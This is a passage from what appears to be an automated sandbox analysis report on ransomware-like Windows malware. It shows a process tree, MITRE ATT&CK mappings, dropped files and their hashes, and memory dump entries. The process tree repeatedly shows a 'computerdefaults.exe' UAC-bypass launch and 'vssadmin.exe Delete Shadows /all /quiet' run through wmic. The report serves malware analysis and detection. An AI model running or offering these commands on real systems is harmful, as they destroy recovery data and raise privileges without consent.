  2⤵
  PID:5584
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5264

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4852
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5536
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5308

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5648

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5312

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5712

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:6024
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5136
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4184

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:6092
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6008
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5240

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1728

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:376
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5224
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5548
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5556
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5804

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5908
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5188
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5980

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5544

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5716
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5744

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6088

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5160

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4912

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4356
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5900
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1440

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5196
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6104
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1760

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5988

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4184

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5604

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2880
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6088
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5780

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3376
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5440
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5836

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:728

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
977be686a2fa95fd58d4b6e3cf0d7884

SHA1
015b35a6efef8e465a95cb40179e3319e71c293d

SHA256
e2b8da784d4db0fbe16761f0b81ef6414e4b84b233b63050e8023f3f86ef8812

SHA512
c996379e893026309127222dcad27261978ae233ca08117d7464cf810045578ce3c87bdd39f976ebb1a6f0a73b617f1fbc7fb8348741ae56ada237e6e5f5aae7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
81b40971034dadfe5be7f6975a07ec89

SHA1
9780b8b91043a6e33538c694c0aacaf731371d8f

SHA256
b1a54f40dc5a1cfd9504e5e3cece5d4a8fe33b44f82a7c311e272bb89b1e0a92

SHA512
b2d1146fb479e1c6c644677892a1e44d5a805d9205f1aa756548be457cf7795a9b6d0a8a72bcaafee299c26ef2fd237245a5b38d86cc8f143dfd39496436043f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d2e5e32a1d17ded5016384b9ad867305

SHA1
f8966c5225458996db4220aeedb4da819bdce46e

SHA256
f737e5e435f222b126cf9e38421e40626f7a397bde994c4f26763e3cc388a5df

SHA512
313959e6b0db24833253f2c5375c4163cd7d689b2818d09f368311a55b9d32f6cf1b612dea5aaafe9a8db096ab0ac9c79eb1b6114ccee17310e5e9f44194336f

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133778691422624591.txt

Filesize
75KB

MD5
93ebc3ec5cf840b4509282e9d7ff10d4

SHA1
439a1063756dc26ef3330bac9d1897cb38c42fd6

SHA256
e8a625d967458734d9c5e03ca15cb52bc6e7ae828d4383821eb5583e0e8b06b4

SHA512
5f92e79500ed4cec65827c1f4d8ebd9ecf0bb5ed151c2c71309edfe8b09e8be7515fa6cfa34252e20e90aac76dd6d4521eacfcabfab9d4773fa553fd30109535

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

Filesize
10KB

MD5
a39ce4b6fc5e33aa77f0d2a1a0a2962e

SHA1
c596884998bd6cdd8c60c240b1dbe05258dc2e4f

SHA256
261f067d9c2a8e99ea7e320b359a6df4882df4e253e419197c89a28474d18161

SHA512
e83ec508e31a1669a6bd49c8ae51a27925f3a4fb68ed4791adcecc2f6c766751307c94c8c601f942459c760a90e29f2e6a37b1e1106d2fdd0bf3e981d05e38bf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

Filesize
3KB

MD5
d60f8cd0b7974f1debadde3a8351ac9b

SHA1
48dbf91954e109d51007e69b7f1c79311115917d

SHA256
8b5a809172aa21cab40b8c4eb25af0eb02ef2d865fcf6aaba9e46b97f589a6c3

SHA512
77f3690028a26aca4399f3d04428c9d4ecb69660d14eca3adb443ba33b5f6280630c49bcbfc39bd7ca7c5537106af368147d661dfb0b2a8a44c054ad9fc36ae1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
8KB

MD5
8df5844e267d673ef38aae4bc04f3c6c

SHA1
d7f64595b4987c87c225c3a355254a17771ea344

SHA256
a7ec775ec7ff36f06de7d83a2015cb0c717bcfc35f66c689ee4a50a49a0e3f63

SHA512
4acc425a1815746f5196c1ebe05a90b5ab98c14460eed4430da10dc2b868dacd028453a4832df7ffe3e662094184416d3b91ba480f8dfab494850ab3182335f3

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
e56493345d1a19bf98c9a039c9c84a78

SHA1
b75e77b959f8293a51cf4b08b117f19cabbb8125

SHA256
fd397a29aa4c88d195700c983f83b617519931ac3b9088a7b8a550cbb557a129

SHA512
80c5008455079ef1c9ae6e135d69ee11d1858e75f841df3f975bb8b49acb39a4e1d524d78414a3028f39659b1c9019575fcd73a040f8592cced5ad1810c4fd0f

Download Submit
C:\Users\Public\readme.txt

Filesize
332B

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
memory/2196-4-0x000001FA1EDA0000-0x000001FA1EDA1000-memory.dmp

Filesize
4KB

Download
memory/2196-1-0x000001FA1ED70000-0x000001FA1ED71000-memory.dmp

Filesize
4KB

Download
memory/2196-3-0x000001FA1ED90000-0x000001FA1ED91000-memory.dmp

Filesize
4KB

Download
memory/2196-5-0x000001FA1EDB0000-0x000001FA1EDB1000-memory.dmp

Filesize
4KB

Download
memory/2196-6-0x000001FA1EDC0000-0x000001FA1EDC1000-memory.dmp

Filesize
4KB

Download
memory/2196-7-0x000001FA1EDD0000-0x000001FA1EDD1000-memory.dmp

Filesize
4KB

Download
memory/2196-0-0x000001FA1EE00000-0x000001FA1F091000-memory.dmp

Filesize
2.6MB

Download
memory/2196-2-0x000001FA1ED80000-0x000001FA1ED81000-memory.dmp

Filesize
4KB

Download
memory/2196-9-0x000001FA1F0D0000-0x000001FA1F0D1000-memory.dmp

Filesize
4KB

Download
memory/2196-10-0x000001FA1F0F0000-0x000001FA1F0F1000-memory.dmp

Filesize
4KB

Download
memory/2196-8-0x000001FA1F0C0000-0x000001FA1F0C1000-memory.dmp

Filesize
4KB

Download
memory/2196-11-0x000001FA1F1B0000-0x000001FA1F1B1000-memory.dmp

Filesize
4KB

Download
memory/2868-12-0x00000193C3230000-0x00000193C3235000-memory.dmp

Filesize
20KB

Download
memory/3740-343-0x0000025C5A170000-0x0000025C5A171000-memory.dmp

Filesize
4KB

Download
memory/3740-342-0x0000025C5A200000-0x0000025C5A208000-memory.dmp

Filesize
32KB

Download
memory/3740-476-0x0000025C5A260000-0x0000025C5A268000-memory.dmp

Filesize
32KB

Download